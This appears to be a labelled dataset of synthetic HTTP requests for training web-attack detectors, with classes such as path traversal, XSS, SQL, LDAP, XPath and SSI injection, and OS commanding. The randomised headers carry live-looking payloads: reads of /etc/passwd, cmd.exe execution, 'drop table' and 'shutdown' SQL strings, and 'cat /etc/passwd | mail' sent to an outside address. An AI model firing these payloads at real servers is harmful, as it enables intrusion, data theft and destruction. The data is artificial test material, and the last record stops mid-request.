GET /ywsyjPe1Wh4s5ymE.b/lPb52t/oKgoyi4/CaJgarDe9ti2oofnueh1/F@rcpAP@aG_kqMqTk/fc/anoytolc/tInttcUe.jpg?ifnrdqmkcnuu7=%3D1e%299&Tshbec=yse&r2e=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&eane5stittslani=r5+%28a&stelnl6ttDsomt=1586548804&r7gec7e8hlafe=7766 HTTP/1.1
Host: 55.105.79.245
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: j07-x1, l9-chnEpeeO, c-s;q=0.4, oet5o-w
Cache-Control: no-transform
Client-ip: 131.126.28.0
Cookie: yhh3aUab7et4eo=@updateis1z;eahcr5muhlmi=233
Cookie2: $Version="92"
Date: Tue, 31 Jul 07 22:23:18 CET
ETag: "qTKDkaKodzPSVS8-"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sun, 11 Sep 05 07:10:35 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: "et5l2-rKm5wHYP0otux"
If-None-Match: *
If-Range: "P@OlARrJA@2O_DM3S"
Max-Forwards: 756
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM dHRqZWRFSzNkcmF0Y2ltNXR0YW10ZzhmbHpuNWRuZGFJc2hlaQ==
Authorization: Basic dFpyaHNlOnJ0bjhPMA==
Range: -99,17-4389
Referer: http://www.ybDtr.gov/edMo.jpeg
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: hiaittv (gzor.XKHQ; gAGaz3W0j3; t8Cktk4qg; mD4R.qEkl3)
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.5 www.las2ets.jpg
Transfer-Encoding: 0geei
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46278
Start - Id: 45238
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.eifsg3o6l.fr:80
Connection: close
Accept: audio/*, application/rtf;q=0.0, image/gif;q=0.4
Accept-Charset: x-mac-japanese;q=0.1, windows-1253;q=0.5, windows-1255;q=0.7, isiri-3342;q=0.6
Accept-Encoding: *
Accept-Language: hnl-7sF
Cache-Control: no-store
Client-ip: 83.132.12.183
Cookie: tz=ueEAeO-tservicesutx r;8metaV5k=r@.j;toao4hnt=AN
Cookie2: $Version="071"
Date: Thu, 22 Jan 09 17:00:10 GMT
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: lthuh
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Fri, 30 Sep 05 20:40:57 UTC
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: *
Max-Forwards: 5750
MIME-Version: 3.6
Pragma: y=gr
Proxy-Authorization: Digest qop=evai40
Authorization: Basic b1l0c2U6OHRuaUFscw==
Range: 220-5761,42620-
Referer: http://www.o3eoolF.com/Iasxppb/gopiUea/d6lnres.cgi
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: r4sne (uaNL168V.)
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 4.4 176.45.158.137, FTP/3.3 144.100.8.10
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45238
Start - Id: 44710
class: PathTransversal
POST /uaxees0r/nlbgr/etcWaNTO/inkrcTsvovnognosno/ocsi/q0SbJEstyleYXmail.pl? HTTP/1.0
Content-Length: 127
Content-Language: a,ntiSuo,ec
Content-Encoding: compress
Content-Location: http://eAp2.it/grNdo/Ozge/z1dt8at/oyLboi/twan.jpeg
Content-MD5: ZXI5NW42MlRSVFJucjNjdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jun 08 14:44:43 CET
Last-Modified: Fri, 04 May 07 01:21:53 GMT
Host: 34.185.208.221
Connection: close
Accept: audio/*
Accept-Charset: macintosh;q=0.3, cp-936;q=0.4, x-mac-cyrillic;q=0.3, windows-1252;q=0.8, iso-8859-8-i
Accept-Encoding: 
Accept-Language: fIh-q;q=0.5, taorhkoh-f2cni, oetjee0E-lHIiyi;q=0.4, ta2oa-aMgjAyhA;q=0.8
Cache-Control: no-store
Client-ip: 19.48.42.232
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="933"
Date: Wed, 13 Oct 04 01:14:02 CET
ETag: "plt73QUn8kWDZLJVBbM"
Expect: 5teotwi=c4dkufDm;eodxa=0orrzrci
From: Lsoa@meyumffmar.uk
If-Modified-Since: Sun, 26 Apr 09 20:12:39 CET
If-Unmodified-Since: Wed, 21 Jul 04 14:16:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 4.9
Pragma: wHoo8pu=6ls
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic TmFycjowR3RZaA==
Range: 8542-,-709
Referer: http://www.nypdt9.be/l6e7E.aspx
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: ghdlIwisreb5c
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: FTP/3.1 www.aNes.tiff, fraa/8.9 178.36.234.229
Transfer-Encoding: gzip
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 321 92.208.70.203:11 "elAnigceatyit1" "Sun, 21 Nov 04 10:31:52 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~

ZVZVj=asJgk0@&Abqiaht=aZqkSu8re2r&Ecvet7tl=igSu6Fa&TeeoassGtrd=neecpRnah1o&mah=file:///i:/nEw14/ayi/mhlld.xml

End - Id: 44710
Start - Id: 36045
class: PathTransversal
GET /eaeenoofi/iEZ/9ma2/nefsrhiye6.php4?nFmorwmttF9sa=ewhas0e&1na2nhdfi6ta=3342503&I3Md93E=3lel15adaLsotSoi&rla=lfbudtruei3&t1uhLhcea=coeya&aeSO=eci0Gasnv&OrdyNB3W=asts4xbhtdlyMor&lr2aN6=zrNt&lyshrttTntl=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&F5Dna8mailB=riboepM%3Dch%3Crcoiri&SeeEieiareun2a=2ab0td HTTP/1.0
Host: www.iEb4a.cz:80
Connection: spoEeds
Accept: text/plain, image/png;q=0.9, audio/*;q=0.7
Accept-Charset: iso-8859-1, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 70.170.187.44
Cookie: gtdoEo=7KBxF;Cha4r4xojRe8dsr=101392;ND4formh-Ls2telnet=b hobexect?0certotsB;titlAsjhirun=pfL1xetaieee8a8Xd;eettp=61921
Cookie2: $Version="69"
Date: Sat, 31 Dec 05 06:33:05 GMT
ETag: W/".l1xi4XzvcD1Rn.Isdt"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Tue, 29 Aug 06 24:10:42 CET
If-Match: "cpJg7Avs94O@02kroeWj"
If-None-Match: "G9IaU4.Ie-nYJpc"
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 1
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="cK41eie"
Range: 709-485
Referer: http://www.widot.ch/r8itso/sjsat/oeEel/on4uym.cfm
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 1.0; uo-9t; rv:3.6.8) Gecko/94841734
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 9.6 213.254.226.252
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 503 230.183.212.133 "reoem7gfiotv8mdeeL0V" "Sat, 30 Jan 10 17:01:26 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36045
Start - Id: 48183
class: XSS
PUT /w0/mCgwd/btfCj@WIBnull1/s.yeGx5ZjZu/uo3tp/Vftp5P2/s3AKulYnHdhKk/kr0atoadeekrxeaelns/nGI7qULtjXJzxsf.gif? HTTP/1.1
Content-Length: 14
Content-Language: 3lhpmtt,x3,eAfteyEo
Content-Encoding: identity
Content-Location: http://www.iLhRuau.de/rrxd.htm
Content-MD5: Y253cGV6cHN2M2V0ZGU2ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Aug 07 05:27:53 GMT
Last-Modified: Fri, 11 Mar 05 24:11:03 GMT
Host: 145.177.84.253
Connection: iithmte7
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity;q=0.2, gzip, compress;q=0.8, identity
Accept-Language: <xml    src = "   javascript: [alert   ('aouawi');]  " >
Cache-Control: min-fresh=77
Client-ip: 196.219.140.167
Cookie: tsty=h46ri;uebRi7lhdss=91572569;ydt15fl1uesc=424;ngday9stbene=7;AdN7WlJZechoQF=374
Cookie2: $Version="60"
Date: Sat, 01 Nov 08 19:41:23 GMT
ETag: "13Q28YBJBklXk8y"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Sat, 24 Apr 04 16:31:23 GMT
If-Unmodified-Since: Tue, 20 Jan 09 17:01:09 GMT
If-Match: "44MZ27-OH6eS@oP"
If-None-Match: "qdZfwwoxkc3HhGUWhxWD"
If-Range: Sat, 29 Nov 08 19:52:06 UTC
Max-Forwards: 00
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: snef otwda=wezessn
Authorization: Digest realm
Range: 57637-,977-
Referer: /oasfl/sesgxct.php4
TE: gzip,chunked
Trailer: Range
User-Agent: javascript: alert  (   "Si2r.aratnr")
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 4.0 www.6l6hiou.gif, 3.7 170.69.119.111, 7.9 12.24.134.127
Transfer-Encoding: compress
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 142.177.244.22
X-Serial-Number: 2322173255
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vRnufieonIhe=r

End - Id: 48183
Start - Id: 38159
class: LdapInjection
GET /o-OaghVBiJmuNGhDKez/x7oIh9XQqQ.jsp?hinss4bhoAi=au%29%28++%7C%280ns%3D*%29&rliuaoteeamxbde=91&3sAth=ai9&yf7zoEladaw=It+1&rtanshTatir=s HTTP/1.1
Host: www.pgeletmShs.it
Connection: keep-alive
Accept: image/*;q=0.5, video/*, application/*;q=0.9
Accept-Charset: x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=212
Client-ip: 253.14.42.39
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="8"
Date: Mon, 12 Jun 06 10:08:23 CET
ETag: W/"oYZOAXe-lop@UENF"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Sun, 04 Apr 10 11:00:57 CET
If-Unmodified-Since: Sun, 26 Nov 06 21:04:14 CET
If-Match: "IRWVsObenByGIye0hs8"
If-None-Match: *
If-Range: Wed, 17 Feb 10 03:57:04 UTC
Max-Forwards: 1916
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: 4-,5139-9
Referer: /2rabt9a/EixxFh2s/rh1ii6/su1h/mde8tu4.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 2.1; rt-lr; rv:8.1.9) Gecko/59751545
UA-CPU: x86
UA-Disp: 311,524,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 1.6 116.31.74.204:8175, 5.7 185.107.59.153
Transfer-Encoding: sctr
Upgrade: eeu/8.8, fSe7/3.7, nho/6.1, rqw/6.3, SLsti/8.0
Warning: 967 www.teLieti.js "bUr2" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38159
Start - Id: 42987
class: OsCommanding
GET /mNhTttscts6/wp-iframeczmetabye/cbetnttttdvstaid/tlsjedhUO/imosmtie/a0JM6HJKxpqv3.shtml?nmflmzyeste2e=e_U2W5Z&iaraseeactseyej=aomhid19gt&at8ft=oeSset+a&l3eNton=nUE%3Beqil&hryabh=7x&VkG42cTPS=17240578&ht8=2317429462 HTTP/1.1
Host: 8.80.220.169
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: ce-u5guesr;q=0.2, 9rliHNl-vstnan;q=0.1
Cache-Control: no-cache
Client-ip: 177.117.197.94
Cookie: nwhhbheocldhsmm=889013957;oeQlocEn=oops     ;  cat /etc/passwd     |     mail your@W2qaO.com
Cookie2: $Version="910"
Date: Thu, 22 Sep 05 04:18:56 UTC
ETag: W/"kfEM4sG8zo5gSR-H@a@"
Expect: moEazR
If-Modified-Since: Fri, 11 Jan 08 07:09:36 UTC
If-Unmodified-Since: Mon, 18 Jun 07 05:47:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 5.7
Pragma: tw=i5ad
Proxy-Authorization: ws2oed nnitapa=iroLw
Authorization: Basic bXJlaHVwZ2E6b2pjYQ==
Range: -019,88587-67,-152063
Referer: http://pvrcwNoi.net/aajg/tEdboorl.js
TE: chunked,chunked,trailers
Trailer: TE
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 2.0; p6-5e; rv:2.8.7) Gecko/60830468
UA-Pixels: 663x0637
Via: FTP/0.5 219.253.9.22
Transfer-Encoding: identity
Upgrade: wfH/1.6, nhn/7.3
Warning: 039 www.Eokre.jpeg:041 "4lreajoto" "Sun, 24 Jan 10 22:37:46 UTC"
X-Serial-Number: 104195049605693
----: -------------------------------------------------

null

End - Id: 42987
Start - Id: 42613
class: SqlInjection
GET /TcsySaiIesrn.jpeg?uhome8jkc.services=070&pqeiqu4=dsnuEp&sp6irDaisMAm=1185&oe2d25acatng=87078&eoccflta=139315&nfS=vRLMW281cX&epjdoLal7ql=28048158&Q.TVDK=z&eascitu=%27%3B++shutdown--&mm1Eg3=648078 HTTP/1.1
Host: www.fndayQeih.st
Connection: close
Accept: image/gif
Accept-Charset: iso-8859-7, x-mac-arabic;q=0.4
Accept-Encoding: compress, deflate;q=0.6, deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 105.113.178.254
Cookie: ayqi0m=a3~ d;1qrn=rvZarj3vkgG
Cookie2: $Version="901"
Date: Fri, 22 Aug 08 19:12:27 GMT
ETag: W/"RpfztADFc0B-kyDZ"
Expect: t9eEetml=oiti
From: auoiBfre@itih.st
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Fri, 01 Jun 07 03:18:48 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 12
MIME-Version: 0.0
Pragma: yar='sest'
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Digest uri=http://c7pehg.gov/wlTmc5eu/2Atai/meaa/st4lt/bneleeEA.fgf
Referer: /aseeia/y2fouwl/nzifwwep/sEic9ets/gyc9e.avi
TE: trailers
Trailer: Authorization
User-Agent: uprcdc/6.3
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: ali/5.1 64.227.232.123, 4.9 www.eicsu.js
Transfer-Encoding: mxgaf
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 057 156.192.176.145 "wyseIt" "Mon, 14 Dec 09 05:20:58 UTC"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42613
Start - Id: 47215
class: XSS
GET /nhd1hwts5nn/nrzcfsnd/areeeemaqdnTosthmtfP/tK85/e23z7g93m4QkzbB/eaa6s0h/rnirnsE3roa.js?mtlrrne=mcseteh3ec&0rrfetenisJrs=or&aioae66eiwcxui=%2Bbosfdfta&peTjrme1Mtano=C%24i%5B&cm6wgethIiA=hecho5m&rtHiemoTitE=%3Cimg++dynsrc%3D+++%22+++++javascript%3A++++%5Balert++++%28%27tmd%27%29%3B%5D++%22+%3E&LPlinkUoeM=ftp%3Du&eahtdaPmsamo7o=953965&wc8sahp=1&Ymwlu=8&XxtermZinput9=or9Uhu&ts7RE=43&ul=ropaI8Czh49oahle&obdtnuadu60rg=79&Isro=rmUq6H HTTP/1.0
Host: 31.222.171.162
Connection: ddyI
Accept: audio/x-wav, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yoh-sevehaip;q=0.7, aa-Xsnn
Cache-Control: no-transform
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Fri, 03 Oct 08 13:37:07 CET
ETag: "sffq97EglwyE3Ups"
Expect: bpHcbrce
From: sHag@lasiBra.be
If-Modified-Since: Fri, 14 Oct 05 21:14:44 CET
If-Unmodified-Since: Wed, 07 Jun 06 02:12:35 CET
If-Match: "tRlkqTuA.5ZfWZfFKs"
If-None-Match: *
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 27
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest uri=/dtiqe/ostoiddu/8YT9nSuz/4tmx.dll
Range: 4321-2
Referer: http://www.etteKa.ch/5dCou/stHoTs.txt
TE: gzip;q=0.7
Trailer: Range
User-Agent: et8s3hmwm/0.4.2.5
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: 2.4 www.iteobo.png, Aqni/3.3 23.89.217.51, eautm/5.4 www.kaEt.tiff
Transfer-Encoding: compress
Upgrade: sdloi/4.2, a9og/5.3, Who9/3.5
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 255.235.206.195
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47215
Start - Id: 45149
class: PathTransversal
GET /./? HTTP/1.1
Host: 213.218.151.184
Connection: keep-alive
Accept: video/mpeg, video/*
Accept-Charset: x-mac-korean, euc-kr
Accept-Encoding: 
Accept-Language: pTl-ae, ch-l9;q=0.6, iMi-nhvF;q=0.5, anhE-aa
Cache-Control: mfENaEoc='nm26e'
Client-ip: 196.41.87.111
Cookie: atetat=gihqy;c7eitysslr5=55;thdrxeqietarz=95;reanlli5=7lq9:a;eeeaerh7uE=8l|a;QehtaccesciWqxY=sdrgciy
Cookie2: $Version="1"
Date: Sun, 15 Feb 04 04:36:52 GMT
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Wed, 30 Aug 06 11:54:22 UTC
If-Match: "OiyTKUiUAjqcX7sYx"
If-None-Match: "eW9hicL@KKPn5hP"
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 9680
Pragma: no-cache
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: Digest uri=/depBmojv/i0anvi/ertltan/ssor/aleN.msf
Referer: /h1ted.cfm
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.5 (Windows; U; Win98 6.0; cl-Ae; rv:0.4.4) Gecko/94313208
Via: 0.9 48.110.242.45
Transfer-Encoding: identity
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 249.70.128.210
----: ----------------------------------

null

End - Id: 45149
Start - Id: 42763
class: SqlInjection
POST /wbtMIxJItjkhC/1joJMKpNhq/nT94G9UJBQLHSrEfz/bzNwpx73NmgI/tw6snm/iositEela/aWgx/rnjodwis8ayywdkura/thE4hofdtB.shtml? HTTP/1.0
Content-Length: 52
Content-Language: eMh9Rl
Content-Encoding: deflate
Content-Location: /aetnn/rEDce/wtpmeTso/q8a19.txt
Content-MD5: bW5uZWl6dXJ5ZGFwaWRybg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Feb 05 23:47:36 GMT
Last-Modified: Fri, 02 Jan 09 07:41:07 CET
Host: 78.170.220.23:5742
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.8
Accept-Language: cuedaOA-txntsseg;q=0.6
Cache-Control: no-transform
Client-ip: 246.238.255.192
Cookie: oeegovIsrsEKea=';     drop table     admin;irc=dm~iumk;idioMtsss=mo c;4styobifexsgsr0=easJ
Cookie2: $Version="54"
Date: Mon, 02 Oct 06 14:16:05 GMT
ETag: W/"4syG_ceHAAG5p1m.jr"
If-Modified-Since: Fri, 22 Jan 10 06:40:40 UTC
If-Unmodified-Since: Mon, 26 Mar 07 04:38:04 UTC
If-Match: "WP2WnvL@-MHfYhpgB.9b"
If-None-Match: "KWacHlrrXmmS.Xq0"
If-Range: Wed, 07 May 08 04:07:20 CET
Max-Forwards: 8396
Pragma: no-cache
Authorization: L34eso Era8droa=rosit
Referer: /idjAo/8coc/Aubbjvre/ti70d.html
TE: chunked,gzip;q=0.4,deflate;q=0.9
User-Agent: e5-o-_V http://www.nNrenr.biz
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 648x107
Via: 0.7 118.254.177.186, 1.4 73.42.79.233, 7.3 www.reidtho.shtml
Transfer-Encoding: oaTnt
Upgrade: Hic/2.5, elet/9.7
Warning: 191 www.mbisc.gif "soxseOi" 

Giees= sbe9ed;epi&m.hd3Oevalg=224&xheTlTtneo=68386

End - Id: 42763
Start - Id: 50001
class: XPathInjection
PUT /LTinput@45rcpdelete/f10seP6osBtztatS/aGxdxzzjt1PX7uZS9ns/sETbzVZpZ/0Bp3v7bH/tUiehlMenbonHOF.png? HTTP/1.1
Content-Length: 159
Content-Language: tede,zlBtetd
Content-Encoding: identity
Content-Location: /gHTpttv/rNeumaee/2ooa.dll
Content-MD5: YnExZnR0ZW5vdmVudHJkbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Thu, 20 Apr 06 04:55:08 GMT
Host: www.QfDnf.uk
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, windows-1257;q=0.4, x-mac-turkish;q=0.7, cp-936
Accept-Encoding: 
Accept-Language: oen-ivnl, hyeaud-sa;q=0.7, ft4a-gP;q=0.2
Cache-Control: no-cache
Client-ip: 177.9.17.154
Cookie: eftf=e-RcYjT;eh5qdhibuzs=244309;hSnfutVuAenog6=tUF54RZ;mlGk7o=ugujMsnehnRti;poavB9Udaotroie=487
Cookie2: $Version="6"
Date: Fri, 24 Aug 07 11:23:35 CET
ETag: "uXS1_vLt9nQGzEKhQH"
Expect: ceuhtats
From: etjd@onalE.be
If-Modified-Since: Sat, 13 Sep 08 20:10:55 GMT
If-Unmodified-Since: Sun, 01 Jul 07 13:18:09 GMT
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: *
If-Range: Tue, 17 May 05 16:49:48 CET
Max-Forwards: 9
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: egErr TfEaua=iOrh
Authorization: qetsi haat5=cptst
Range: 1-0902
Referer: /odyu.php3
TE: deflate
Trailer: Date
User-Agent: 3Sr'  or path/child::node()[position()=N]     or  'kbjlxuCd'   =   '
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Win98
UA-Pixels: 957x1532
Via: 3.6 192.109.251.159, 7.3 176.244.104.209:1108
Transfer-Encoding: identity
Warning: 398 166.91.243.88:2399 "rnedr7tea5aeoubom" "Mon, 21 Jun 04 14:41:58 GMT"
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d6hlhWd=468065&Ittaa2se1eiyr=2576&8@GJ25dropyykjg=nEIJxH-&N3pDkopt5.replace=1492933&hse=connectI2p%ul0&LmPn=Gtptxpioib&tinmtc=445AzL9a.MF8&Aa_pMqcLp4=2504157

End - Id: 50001
Start - Id: 39509
class: SSI
GET /oeleltacafh/rJfIgSrKerMgy/etzen7yeH2aeAuoVual/eazByrel7lbwt9enoe3/dMeSQfdMWH/-qAOFgg/bdynccJTzpZkamdYcX/K0Tsock_streamx.cgi?xhect3pc=ron7uzbe&Shto=73158&2Ldh0=%406tr1+fo%3E%24ijf%3D&httzha=8&NRmmb1ubmnp=%260%7EwTceo%5Cep&mKdhVual=nldania5alcb&iNnyen8=eIz&nnnane=tE6YZ&efgm1iaOyiaf=l&soea=8rr-zsehluvhtnoc&MZ=anri&reaah=ip%25f-mj81%5Do%3Ds HTTP/1.0
Host: 55.31.237.42
Connection: 4tnan
Accept: audio/*;q=0.7, video/quicktime;q=0.3, audio/*;q=0.7
Accept-Charset: x-mac-arabic;q=0.8, x-mac-cyrillic;q=0.8, x-mac-korean, euc-tw;q=0.4
Accept-Encoding: 
Accept-Language: ssa4b-esaHk, s2-215lutzs, tg-ed;q=0.4
Cache-Control: no-store
Client-ip: 103.250.48.72
Cookie: soyhes7oYlsesr=qa;8@1Dase8=mk;5sgoTgr0kd5uccl=03lYoK;GPSb-I=rrn ;y7r2ah=nbssd+maLash$;aqptensk=nrd
Cookie2: $Version="666"
Date: Wed, 09 Jul 08 09:07:33 GMT
ETag: "Cs@6kzG1GqeSK6I_A29W"
Expect: cmbipi=re3mlit;nels=60i7e
From: awdcmol@95ieaeley.fr
If-Modified-Since: Mon, 30 Apr 07 13:25:19 GMT
If-Unmodified-Since: Sat, 12 Jul 08 18:57:23 CET
If-Match: "F-S1FdQT-MQaD4Q0t"
If-None-Match: *
If-Range: Mon, 07 Mar 05 17:38:55 GMT
Max-Forwards: 3765
MIME-Version: 5.2
Pragma: ir=enddvlei
Proxy-Authorization: aooaI5 nFQs=aht8teci
Authorization: Basic dEM2bTJvQTo2ZXNl
Range: -16479
Referer: http://4SoMetm.fr/d6detdmd.wav
TE: chunked;q=0.0
Trailer: Cache-Control
User-Agent: <!--     #include    virtual="/etc/passwd"   -->
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 8306x0856
Via: FTP/0.9 18.107.71.1:11366, FTP/3.0 243.60.163.40:5, 5.1 www.xnotfi.tiff:0250
Transfer-Encoding: deflate
Upgrade: emim/2.6
Warning: 628 148.151.2.105 "y0cm" 
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39509
Start - Id: 43943
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.lhrltmNn.com
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-3;q=0.0, iso-8859-2, x-mac-arabic;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 203.44.173.36
Cookie: oeidse=sCpsU0ad;isie5d2w=soi;impDoliuhrll=887
Cookie2: $Version="4"
Date: Fri, 24 Feb 06 17:18:36 UTC
ETag: "CAA1BX3UtwQhtOdd"
Expect: Ktdna
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Tue, 04 May 10 02:09:59 UTC
If-Unmodified-Since: Wed, 20 May 09 06:05:33 GMT
If-Match: "Ed_MEUpQFIM27pN2sk"
If-None-Match: *
If-Range: "ZVY.pIs44xPL@0TKY"
Max-Forwards: 8291
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: 4bhso opohyO=ucsru
Range: 080946-24031
Referer: /nAqeptet/yte8rme/ueedtaoe/gpuza.shtml
TE: deflate;q=0.4
Trailer: Max-Forwards
User-Agent: peLdlEwsuoricrkasDv
UA-CPU: 68000
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
